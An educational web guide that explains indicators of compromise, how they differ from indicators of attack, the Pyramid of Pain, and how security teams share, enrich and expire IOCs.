TI News Feed · Threat Intelligence Guides
View live threat intel feed →
TI News FeedThreat Intelligence Guides & ResourcesView Live Feed →
Detection

Indicators of Compromise (IOCs): The Complete Guide

Indicators of compromise are the forensic breadcrumbs of an attack. Learn the main IOC types, real examples, IOC vs IOA, the Pyramid of Pain, and how to operationalize them.

8 min readUpdated

Indicators of compromise (IOCs) are pieces of forensic evidence that suggest a network or host has been breached. Think of them as the digital fingerprints an attacker leaves behind — a suspicious IP address, a malicious file hash, an unexpected registry change. IOCs are the most widely used form of technical threat intelligence, and they power the automated detection and blocking that most security tools rely on.

This guide explains what IOCs are, the main types with examples, how they differ from indicators of attack (IOAs), why some IOCs are more valuable than others, and how to use them effectively without drowning your tools in noise.

What is an indicator of compromise?

An IOC is any observable artifact that, when found in your environment, indicates malicious activity may have occurred. IOCs are typically reactive — they describe something that has already been seen in a known attack. When a security vendor analyzes malware, they extract the IOCs and publish them so that everyone else can search their own logs for the same artifacts.

The strength of IOCs is that they're concrete and machine-readable: you can feed a list of malicious domains into a firewall and block them instantly. Their weakness is that they are perishable — attackers rotate infrastructure constantly, so an IOC that's valuable today may be irrelevant next week.

The main types of IOCs

IOCs fall into a few broad categories:

Network-based IOCs

  • IP addresses — command-and-control (C2) servers, scanning hosts, malicious infrastructure.
  • Domain names — phishing domains, C2 domains, malware distribution sites.
  • URLs — specific malicious links and payload locations.
  • Unusual traffic patterns — beaconing to a fixed external host, large outbound transfers, traffic on non-standard ports.

Host-based IOCs

  • File hashes — MD5, SHA-1 or SHA-256 hashes of known malware.
  • File names and paths — droppers or tools placed in unusual locations.
  • Registry keys — persistence mechanisms on Windows.
  • Mutexes and process artifacts — signatures specific malware creates while running.

Email-based IOCs

  • Sender addresses and display names used in phishing.
  • Subject lines and attachment names from a campaign.
  • Malicious attachment hashes.

Behavioral IOCs

  • A privileged account logging in at 3 a.m. from a new country.
  • A surge in failed authentications (credential stuffing).
  • A workstation suddenly running administrative tools it never used before.

IOCs vs IOAs: a crucial distinction

An indicator of compromise (IOC) tells you an attack has happened — it's evidence after the fact. An indicator of attack (IOA) focuses on the intent and behavior of an attack as it unfolds, regardless of the specific tools used.

For example, a specific malicious file hash is an IOC. The behavior of "a document spawning PowerShell, which downloads and executes a payload" is an IOA — it catches the technique even if the attacker swaps in a brand-new file the world has never seen. IOAs map closely to adversary TTPs and the MITRE ATT&CK framework. Strong programs use both: IOCs for fast, cheap blocking and IOAs for catching novel attacks.

The Pyramid of Pain: not all IOCs are equal

Security researcher David Bianco's Pyramid of Pain ranks indicators by how much it hurts the adversary when you deny them. From bottom (trivial for attackers to change) to top (very painful):

  1. Hash values — trivial to change; recompiling produces a new hash.
  2. IP addresses — easy to rotate.
  3. Domain names — slightly harder, but still cheap to register.
  4. Network/host artifacts — more annoying to change.
  5. Tools — costly for an attacker to replace.
  6. TTPs — the most painful; changing how they operate forces a fundamental rethink.

The lesson: blocking hashes and IPs is useful but easily evaded. Detecting at the TTP level imposes real cost on adversaries and stays effective far longer. This is why mature teams invest in behavior-based detection and threat hunting, not just indicator blocklists.

How IOCs are shared

IOCs are exchanged in standardized formats so tools can ingest them automatically. The most common are STIX (Structured Threat Information Expression), a language for describing threat data, and TAXII, a protocol for transporting it. Many organizations share IOCs through platforms like MISP and OpenCTI, covered in our guide to open-source threat intelligence tools.

How to use IOCs effectively

To get value from IOCs without creating noise:

  1. Automate ingestion. Pipe IOCs from trusted feeds into your SIEM, EDR and firewalls.
  2. Add context. An IOC without context (what campaign, what confidence, what date) is hard to act on. Enrich before you alert.
  3. Expire aggressively. Because IOCs perish, set expiration dates so stale indicators don't bloat your tools or trigger false positives forever.
  4. Prioritize by relevance. An IOC tied to an actor targeting your industry matters more than a generic one. Rank, don't just collect.
  5. Hunt retroactively. When fresh IOCs are published, search historical logs — you may find the attacker was already inside.

IOC formats and where to find them

To be useful at scale, IOCs need to be structured and shareable. The most common machine-readable format is STIX, often transported via TAXII, but you'll also encounter simpler formats like CSV lists, OpenIOC and YARA rules (which match patterns inside files rather than listing static artifacts). Choosing a standard format is what lets one organization's research automatically update another organization's defenses.

Reliable, free sources of IOCs include:

  • Government and CERT advisories — such as CISA alerts, which frequently publish indicators for active campaigns.
  • abuse.ch projects — URLhaus, ThreatFox, MalwareBazaar and Feodo Tracker provide high-quality, community-curated indicators.
  • Vendor threat research — detailed write-ups that include the IOCs extracted during analysis.
  • Sharing communities — ISACs and platforms like MISP, covered in our guide to open-source threat intelligence tools.

The practical challenge is that the same campaign is reported by many sources at once, producing duplicates and noise. A feed that aggregates and deduplicates these sources — and timestamps each item so you can judge freshness — saves analysts hours of manual collection and keeps the indicator set both current and clean.

The bottom line

IOCs are the fast, concrete, machine-readable layer of threat intelligence — essential for rapid detection and blocking, but perishable and easy for attackers to change. Use them aggressively for what they're good at, pair them with behavior-based detection (IOAs and TTPs) for resilience, and keep your indicators fresh. Speed matters: the faster you learn about a new campaign's IOCs, the sooner you can hunt for them. Our live threat intelligence feed surfaces breaking research — often including fresh indicators — from dozens of sources within minutes, ranked by priority.

Frequently asked questions

What is an indicator of compromise (IOC)?

An IOC is a piece of forensic evidence — such as a malicious IP, domain, URL, file hash or registry key — that indicates a system may have been breached. IOCs are used to detect and block known malicious activity automatically.

What is the difference between an IOC and an IOA?

An indicator of compromise (IOC) is evidence that an attack already happened, like a known-bad file hash. An indicator of attack (IOA) focuses on the behavior and intent of an attack in progress, so it can catch novel techniques even when the specific tools or files are brand new.

What are the main types of IOCs?

IOCs are generally grouped into network-based (IPs, domains, URLs), host-based (file hashes, registry keys, file paths), email-based (sender addresses, attachment hashes) and behavioral (anomalous logins, unusual process activity) indicators.

Why do IOCs expire?

Attackers constantly rotate their infrastructure — registering new domains, changing IP addresses and recompiling malware to produce new hashes. As a result, a given IOC may only be valuable for hours or days, which is why teams expire indicators and prioritize behavior-based detection.

Related threat intel guides

FundamentalsWhat Is Threat Intelligence? A Complete GuideFundamentalsWhat Are TTPs? Tactics, Techniques & Procedures ExplainedFrameworksThe MITRE ATT&CK Framework, ExplainedDetectionWhat Is Threat Hunting? A Practical Guide